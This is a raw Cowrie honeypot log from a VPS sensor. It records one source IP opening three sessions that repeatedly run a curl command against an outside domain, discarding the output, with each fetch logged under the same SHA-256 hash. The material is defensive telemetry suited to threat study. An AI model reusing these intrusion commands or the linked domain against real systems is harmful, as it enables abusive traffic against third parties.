{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.192258Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.192985Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.196165Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.196933Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.202027Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.203145Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.205617Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.229708Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.231486Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.232291Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.235346Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.235908Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.238801Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.239622Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.270921Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.273194Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.276159Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.277035Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.277647Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.280536Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.281246Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.283314Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.284646Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.285132Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.316108Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.317208Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.317796Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.321945Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.322426Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.323763Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.324482Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.328427Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.356559Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.359474Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.360509Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.361006Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.363343Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.364186Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.365813Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.366425Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.371058Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.399051Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.402188Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.403915Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.405557Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.406204Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.408141Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.409192Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.411455Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.412057Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.415370Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.444897Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.447083Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.449368Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.451294Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.451990Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.456115Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.458361Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.459635Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.460426Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.464170Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.479480Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.520517Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.522022Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.522599Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.524753Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.526586Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.530030Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.532776Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.536863Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.537486Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.563856Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.567719Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.570193Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.571235Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.573411Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.574009Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:43.575993Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.576552Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:43.580625Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
